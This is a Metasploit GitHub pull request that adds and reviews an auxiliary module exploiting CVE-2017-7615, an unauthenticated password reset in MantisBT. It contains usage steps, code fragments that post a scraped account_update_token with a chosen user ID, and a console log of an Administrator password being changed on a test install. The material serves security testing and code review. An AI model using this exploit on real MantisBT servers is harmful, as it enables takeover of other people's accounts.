Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add a module for CVE-2017-7615 #8671

Merged
merged 9 commits into from Jul 12, 2017

Conversation

Projects
None yet
4 participants
@jvoisin
Copy link
Contributor

jvoisin commented Jul 9, 2017

Add a module for CVE-2017-7615, aka an unauthenticated password reset in MantisBT.

Verification

List the steps needed to make sure this thing works

  • Setup MantisBT (you can get the version 1.3.0 here or from sourceforge)
  • Start msfconsole
  • use auxiliary/admin/http/mantisbt_password_reset
  • set RHOST <target IP>
  • Verify that the module outputs [+] Password successfully changed to …
  • Verify that the password works

jvoisin added some commits Jul 9, 2017

4. Do: ```set rhost```
5. Do: ```run```
6. If the system is vulnerable, the module should tell you that the password
was successfulyl changed.

This comment has been minimized.

Copy link
@bcoles

bcoles Jul 9, 2017

Contributor

"successfully"

['CVE', '2017-7615'],
['EDB', '41890'],
['URL', 'https://mantisbt.org/bugs/view.php?id=22690']
['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']

This comment has been minimized.

Copy link
@bcoles

bcoles Jul 9, 2017

Contributor

Inconsistent indentation

],
'Platform' => ['win', 'linux'],
'Privileged' => false,
'DisclosureDate' => "Apr 16, 2017"))

This comment has been minimized.

Copy link
@bcoles

bcoles Jul 9, 2017

Contributor

I don't think , is allowed in DisclosureDate.

Make sure you run tools/dev/msftidy.rb

This comment has been minimized.

Copy link
@jvoisin

jvoisin Jul 9, 2017

Author Contributor

It doesn't raising any warnings here.

'vars_post' => {
'verify_user_id' => datastore['USERID'],
'account_update_token' => $1,
'realname' => 'jvoisin',

This comment has been minimized.

Copy link
@bcoles

bcoles Jul 9, 2017

Contributor

Can the realname be randomized? Rex::Text.rand_text_alpha(rand(5) + 8)

This comment has been minimized.

Copy link
@jvoisin

jvoisin Jul 9, 2017

Author Contributor

Sure

password = datastore['PASSWORD']
end

res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/

This comment has been minimized.

Copy link
@bcoles

bcoles Jul 9, 2017

Contributor

Is this meant to be an if conditional?

This comment has been minimized.

Copy link
@jvoisin

jvoisin Jul 9, 2017

Author Contributor

Nope, it's meant to get the token later, with $1.

This comment has been minimized.

Copy link
@bcoles

bcoles Jul 9, 2017

Contributor

Will MantisBT accept the request if the account_update_token is '' ?

If not, it might be nice to handle this scenario, with something like:

if res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/
  token = $1
else
  fail_with(Failure::UnexpectedReply, 'Could not retrieve account_update_token')
end

This comment has been minimized.

Copy link
@jvoisin

jvoisin Jul 9, 2017

Author Contributor

Sure ♥

['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
],
'Platform' => ['win', 'linux'],
'Privileged' => false,

This comment has been minimized.

Copy link
@bcoles

bcoles Jul 9, 2017

Contributor

Privileged can be removed for auxiliary modules.

if datastore['PASSWORD'].blank?
password = Rex::Text.rand_text_alpha(8)
else
password = datastore['PASSWORD']

This comment has been minimized.

Copy link
@bcoles

bcoles Jul 9, 2017

Contributor

Does MantisBT make use of a password complexity policy? It might be nice to print_warning if the specified password is too weak to pass the complexity requirements.

This comment has been minimized.

Copy link
@jvoisin

jvoisin Jul 9, 2017

Author Contributor

Absolutely not :D

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Jul 9, 2017

Thanks @jvoisin !

jvoisin added some commits Jul 9, 2017

[
['CVE', '2017-7615'],
['EDB', '41890'],
['URL', 'https://mantisbt.org/bugs/view.php?id=22690']

This comment has been minimized.

Copy link
@bcoles

bcoles Jul 9, 2017

Contributor

Missing comma , at end of line.

@pbarry-r7 pbarry-r7 self-assigned this Jul 12, 2017

@pbarry-r7

This comment has been minimized.

Copy link
Contributor

pbarry-r7 commented Jul 12, 2017

Verified, works as advertised for me (and did, indeed, change my Administrator account's password!):

$ ./msfconsole -q
msf > use auxiliary/admin/http/mantisbt_password_reset
msf auxiliary(mantisbt_password_reset) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(mantisbt_password_reset) > set TARGETURI mantisbt
TARGETURI => mantisbt
msf auxiliary(mantisbt_password_reset) > run

[+] Password successfully changed to 'KEYooXFe'.
[*] Auxiliary module execution completed

I have a few very minor style (and one spelling) tweak, will commit then land. Thanks, @jvoisin!

pbarry-r7 added some commits Jul 12, 2017

@pbarry-r7 pbarry-r7 merged commit 5802196 into rapid7:master Jul 12, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

pbarry-r7 added a commit that referenced this pull request Jul 12, 2017

@pbarry-r7

This comment has been minimized.

Copy link
Contributor

pbarry-r7 commented Jul 12, 2017

Release Notes

The ability to reset the password associated with any user ID for vulnerable versions of MantisBT has been added.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.